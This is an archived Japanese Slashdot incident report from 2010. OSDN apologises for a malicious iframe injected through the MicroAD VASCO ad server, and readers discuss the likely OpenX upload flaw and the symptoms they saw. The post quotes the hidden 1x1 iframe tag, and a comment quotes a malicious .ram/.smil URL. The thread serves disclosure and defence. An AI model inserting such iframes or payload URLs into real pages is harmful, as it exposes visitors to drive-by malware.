パスワードを忘れた? アカウント作成
257954 submission
スラッシュドット

ADサーバー掲出タグによるセキュリティアラートと対処について 83

タレコミ by ADサーバー担当者
ADサーバー担当者 曰く、
今回は大変ご迷惑をおかけしまして申し訳ありませんでした。

OSDNのサイトでは、広告バナーの配信のためのADサーバーとして、MicroAD社のVASCOを使っておりましたが、 本来掲出されるはずの広告タグの前に不明なiframeタグ差し込まれるという事態が発生し、その中身によって不明なサイトに誘導されるということが起きてしまいました。

原因が完全に特定でき、OSDN管理のADサーバーに切り替えたのは24日23:30です。 その後、キャッシュなどに残っていないか確認作業を進め、25日0:29にOSDN全サイト で問題ないことを確認いたしました。

具体的な現象としては、vsc.send.microad.jpのJavaScriptから掲出されるタグ において、

<iframe width="1" height="1" src="http://xxxxx.ipq.co/statsm?ref=jp"></iframe>

のようなタグが差し込まれ、ここからセキュリティ上問題のあるサイトに誘導さ れるというものです。

現在も引き続き原因・詳細を調査中ではありますが、状況説明ならびに対処が終わった 旨をご報告する次第です。
なお、問題が発生したADサーバーサービスについては、特段の状況の変化がない限り、OSDNでは今後利用することはありません。

改めまして大変ご迷惑をおかけしましたことをお詫びいたします。

この議論は賞味期限が切れたので、アーカイブ化されています。 新たにコメントを付けることはできません。
  • OpenXの脆弱性 (スコア:5, 参考になる)

    by hauncon (35640) on 2010年09月25日 16時20分 (#1830240)
    MicroAD社のVASCOというサービスですが、ちょっと調べるとオープンソースのOpenX [openx.org]というソフトウェアを利用したサービスということが分かります。 そのOpenXですが、今月14日にセキュリティアップデートの案内 [openx.org]を出しており、該当記事のコメント [openx.org]にあるニュース記事へのリンク [h-online.com]を辿ると、今回と同じように脆弱性をつかれてマルウェアを配布し、Googleの警告が出るという事例が出ているようですので、今回の騒動もOpenXの脆弱性が問題だったのかもしれません。

    記事で書かれているOpenXの脆弱性は、ビデオプラグインに関するもので、ofc_upload_image.phpというコードが、ユーザ認証もなしで、実行可能スクリプトもサーバー上に保存できるというもののようです。対応としては、admin/plugins/videoReport/lib/ofc2/ofc_upload_image.php のファイルを消すだけということですので非常に簡単なように見えますが、実行可能スクリプトを好きにuploadできるということは、既に脆弱性を突かれた大元の広告サーバーについては、該当ファイルを消したとしても他のサーバー内のファイルは信用できないということになります。もしこの脆弱性が突かれていたとしたら、MicroAD社のサービスを切り離すのは正解でしょう。

    また、今回の問題がこの脆弱性に起因するものでなかったとしても、この脆弱性が残るOpenXを使用しているサイトには同じ騒動を起こさせることが可能かと思いますので、広告関連の業界の方はチェックが必要でしょう。

    --
    Hauncon
    • by Anonymous Coward on 2010年09月27日 0時06分 (#1830739)
      影響を受けたサイトのうちgigazine.netとlifehacker.jpは、現在、ページのソース見るかぎりはVASCOのではないけれどOpenXっぽいシステムを使っているようです。
      気になるのは、以前はVASCOを使っていたのかということ。
      つまり、以前はVASCOと共に併用していて、今回VASCOを外した結果なのか、それとも以前からVASCOは使っておらず、MicroADとは別のOpenXを使ったシステムで、MicroADと同じ攻撃を受けた結果だったのか、と言う所。
      確たる情報もなく、憶測でしかありませんが、概ね同じ頃に影響を受け、比較的短時間で復旧しているっぽいので、前者なかと思っていました。
      しかし、事が起こる前の事は確認のしようがないし、中の人じゃないと実際の所は分からないと。

      そういえばWeb魚拓ってありましたね。
      ギガジンのは残ってないのですが、ライフハッカーの方はありました。
      http://megalodon.jp/2010-0718-1818-42/www.lifehacker.jp/2010/07/100716virutalbox.html
      #事件の後ですし閲覧はご注意を。
      このソースを見るかぎりVASCOを使用しているような所はありません。
      もしかして後者だったのでしょうか?
      #実際は自社広告システムで各社のサービスに振り分けているだけかもしれませんが。

      ※以上については過分に憶測が入ってます。
      親コメント
  • 素性を調べた所、ipq.coは任意のIPアドレスを、xxx.ipq.co(xxxはランダムに生成される文字列)というFQDNでDNSに登録するサービスのようです。
    作者のブログ(英語) [johnleach.co.uk]、Googleのセーフブラウジング診断ページ [google.com]

    安直なサービスなので、フィッシングサイトも利用してしまった模様。

  • 0.0.0.0 (スコア:4, 参考になる)

    by sunnydaysundey (32697) on 2010年09月25日 16時42分 (#1830244)

    以前からGoogle Analyticsと同じように [srad.jp]

    0.0.0.0 vasco.send.microad.jp
    0.0.0.0 vsc.send.microad.jp
    0.0.0.0 associate.microad.jp
    0.0.0.0 cache.microad.jp

    みたいなの書いてた自分勝利?

    この他、トラッキングとか広告、カウンターのためだけのホストは
    手当たり次第にhostsに0.0.0.0登録しています。

  • PDFファイル (スコア:2, 参考になる)

    by Mistbow (12027) on 2010年09月25日 5時05分 (#1830100)
     私はPDFは直接開かない設定にしていたためダウンロードダイア
    ログが表示されキャンセルできたのですが、ipq.coのPDFファイル
    を自動的に開こうとする状況になっていたようです。
     メモは取っていないのですが、PDFファイル名はランダムっぽい
    英数字となっていました。

     PDFファイルを使ってAdobe Reader経由で何かしようとした可能
    性もあるので、ブラウザ内で表示したりAdobe Readerで開いてしま
    ったりした場合は注意したほうがいいかもしれません。
    • by ksyuu (4917) on 2010年09月25日 10時34分 (#1830136) 日記

      私の環境では,メディアプレイヤーが起動しました。
      すぐに閉じたので,その後の挙動は不明ですが。

      親コメント
      • Re:PDFファイル (スコア:1, 参考になる)

        by Anonymous Coward on 2010年09月25日 11時10分 (#1830146)
        Chromeでここのサイトを見ていたときに勝手にVLC Media Player(1.14)が起動しました(21:30過ぎか?)。
        すぐに終了させたので詳細は不明です。
        親コメント
        • 私のChromeでもVLCが起動してました。
          で、どうやら「hcp.ram」ってファイルを勝手に開こうとしてたみたいです。
          (ウィンドウ最下部のダウンロード済ファイルに表示されていた)
          このramファイルの中身を確認したところ「http://79.142.65.245/inc/tmp/hcp.smil」となってました。
          タイムスタンプによると23:08の出来事らしい。

          あと、何かのプラグインを入れてもいいかってメッセージがページ上部に表示されていてました。
          具体的に何を入れようとしているのかという情報を調べる方法はよく分からなかったので、そっから先はわかりません。

          親コメント
        • あれ、リモートから起動されてたのか。怖いな

      • by Anonymous Coward on 2010年09月25日 15時59分 (#1830233)
        私の環境でもまずmedia playerが開きました
        あわてて閉じたら、次に、Javaマーク入りの何か起動して、Security Toolとかいうマルウェア?が起動しました。
        おかげでWindowsをクリーンインストールすることが出来ました。

        #ウィルスセキュリティZERO入れてるんだけど、役立たずだった・・・
        親コメント
    • by Anonymous Coward

      記憶頼りで正確な日時が言えないのでアレなんですが。
      Opera使ってて誤って必要ないマウスジェスチャーをした(ページ先送りかな?)時、ダウンロードするダイアログが出てきて「何これ?」と思いつつキャンセルしてた事がありました。
      何処からのどんなファイルだったかは同じくメモを取って無い(Operaにはメモがあるのにねw)のでよく分かりません。
      で、この現象は少なくとも24日以前からもたびたび起きていました。

      #今思えば「なんだーそーだったのかー?」状態

  • 現在のWebサイトには、見たい目的のコンテンツがある本家以外に
    ターゲティング広告やトラッキングのためのサードパーティコンテンツが
    色々埋め込まれているので、本家だけのセキュリティ措置では
    サイト丸ごとでの安全性を保証できなくなってきてますね。

    特に広告は、何が送られてくるか事前に確定できないので
    こういう事例が発生しやすいんじゃないかと思います。
    #広告サービスを掲載する際にセキュリティ診断審査とかしてないのかな?

    で、今はブラウザでは「サードパーティのCookieの保存」の可否が選択できますが
    これをもっと進めて「サードパーティコンテンツの表示」も
    選択できるようにしてくれないかなあ、なんて思ったりします。

    --
    --------------------
    /* SHADOWFIRE */
  • by Anonymous Coward on 2010年09月26日 18時59分 (#1830607)
    IEのInPrivateフィルタなんか単なるオモチャだと思っていたけれど、InPrivateフィルタをデフォルトで有効にしていたら、microad.jpのインクルードファイルを排除する設定になっていました。たまには役に立ちこともあるんですね。
  • 毎日.jpも (スコア:2, 参考になる)

    by pongchang (31613) on 2010年09月27日 9時39分 (#1830813) 日記
    不正プログラム:毎日jpなど被害 広告配信データ改ざん(記事 [mainichi.jp]2010年9月25日 12時35分(最終更新 9月25日 22時51分))
  • by binsmax (35646) on 2010年09月25日 2時26分 (#1830087)
    docile-jpさんの日記 [srad.jp]に、7netshopping.jpでats.redmancerg.netの警告が出たとか書いてあるので、もしかしたらと思って7netshopping.jpのHTMLソースを見ると、今回の原因と書かれているMicroAD社のVASCOっぽいURLから広告を出しているようです。さらにats.redmancerg.netでTwitter検索をかけてみると、k-tai.impress.co.jp, gigazine, mainichi.jpなんて名前も出てきます。他にもありそうですので、影響はかなり大きそうですね。
  • で、MicroADの発表マダ? (スコア:1, すばらしい洞察)

    by Anonymous Coward on 2010年09月25日 14時42分 (#1830208)

    被害を受けるのは閲覧したユーザーだということがわかっているなら、お詫び広告が入るはずだ。

    #MicroADで?

    • Re:で、MicroADの発表マダ? (スコア:2, おもしろおかしい)

      by Anonymous Coward on 2010年09月26日 2時53分 (#1830359)

      自分でツッコむのもなんだけど、MicroADて行動ターゲッティング広告をウリにしているんだから的確にお詫び広告出せたらすばらしい技術と称える………かな?

      で、「セキュリティ上問題になる広告を出しても一切責任を取らない」という契約になっていないなら、広告掲載サイトは対応の損害賠償請求するべきなんじゃないかなぁ?
      ………広告内容に関してMicroADは責任を取らないって一文がありそうだな(´・ω・`)

      親コメント
    • パナソニックのCMみたいになるのかな...

      まあ、それはそれとして、各位御苦労さまでした。

      --
      M-FalconSky (暑いか寒い)
      親コメント
  • by Anonymous Coward on 2010年09月25日 20時38分 (#1830299)

    確かにAD(=広告)だけどさ・・・技術系サイトだとActiveDirectoryを連想するじゃないか。
    # アンチMSではないはずだが・・・全く面白くないのでAC。

  • by Anonymous Coward on 2010年09月25日 1時54分 (#1830074)
    報告で、「少なくともいつの時点で不適切なiframeが入っていたか」を追加してもらえないでしょうか。
    正確なものは後からで構いませんが。
    • by ksyuu (4917) on 2010年09月25日 10時30分 (#1830135) 日記

      別なサイトですが,21:20過ぎににアラートがでました。
      同じ広告サービスかは判りませんが,攻撃用ファイル名はスラドと同一でした。

      スラドに関しては,21:45-22:00の間にコメントを書いた直後,アラートがでました。
      #ACで書いたので,詳細な時間は秘密。

      親コメント
    • by Anonymous Coward

      自分のツイッターのログによれば、10:01PMにはアラートが出ていました。

      • 私の環境ではNorton Internet Security 2009で「進入の試みを遮断しました」という報告があがりました。

        22:13です。攻撃者URLは記事にあるのと同じドメイン(77.78.240.154:80)でした。

        --
        人生は七転び八起き、一日は早寝早起き
        親コメント
  • by Anonymous Coward on 2010年09月25日 1時57分 (#1830076)
    >原因が完全に特定でき、

    どう考えても突っ込まれますよね。
    原因は何ですか。
    • by s02222 (20350) on 2010年09月25日 2時33分 (#1830089)
      分かって突っ込んでらっしゃるんだろうけど、読んでいて同じところで引っかかったのでフォロー。VASCOが原因と「完全に特定でき」た、ってことでしょうね。「うちのサイトを完全に安全な状態に戻すことが出来たので、とりあえずの作業は完了。報告まで」みたいな。大慌てで作業されたことがうかがえる文章で・・・ご苦労様です。
      親コメント
  • by Anonymous Coward on 2010年09月25日 6時33分 (#1830108)
    基本iframeをオフにしてるので、気づかなかった模様。
    by Opera
    • by Anonymous Coward
      Firefox+NoScript拡張に隙は無かった。
      • by shibuya (17159) on 2010年09月25日 10時52分 (#1830142) 日記
        むしろ多少ワキが甘くても Adblock Plus を使っていたわたしにとってはすべてが対岸の火事だったということか。
        # 時々おもしろいネタ広告があると評判のときはOperaでもSafariでもIEでも起動すればいいし。Google Chromeには広告ブロック用拡張を導入したっけ。
        親コメント
        • by Anonymous Coward
          adblock+noscriptでモーマンタイ。
          • Re:javascriptオフ (スコア:2, 参考になる)

            by shibuya (17159) on 2010年09月25日 14時21分 (#1830198) 日記
            FirefoxのAddon
            NoScriptは操作がいちいちわずらわしすぎるので通常disableにしてます。
            Adblock Plusに加えてjbeef先生イチオシのRequest Policyを使っている。

            さらにRemove It Permanentlyというものも使ったり使わなかったり <-- 天気予報サイトなどではとっても便利。
            広告屋あがったりというクレームは無視の方向で。
            親コメント
  • by Anonymous Coward on 2010年09月25日 12時00分 (#1830157)
    信頼を失うのは容易いという実例。
  • by Anonymous Coward on 2010年09月25日 13時09分 (#1830180)

    mixiアプリを提供していたサーバーが改竄被害、サービス停止に [srad.jp]
    これなんかも関連じゃないでしょうかね
    起きてる(起きた)問題点は似たようなものだし

  • by Anonymous Coward on 2010年09月25日 17時43分 (#1830262)

    下にあってさっきまで気がつかなかったよ

typodupeerror

吾輩はリファレンスである。名前はまだ無い -- perlの中の人

読み込み中...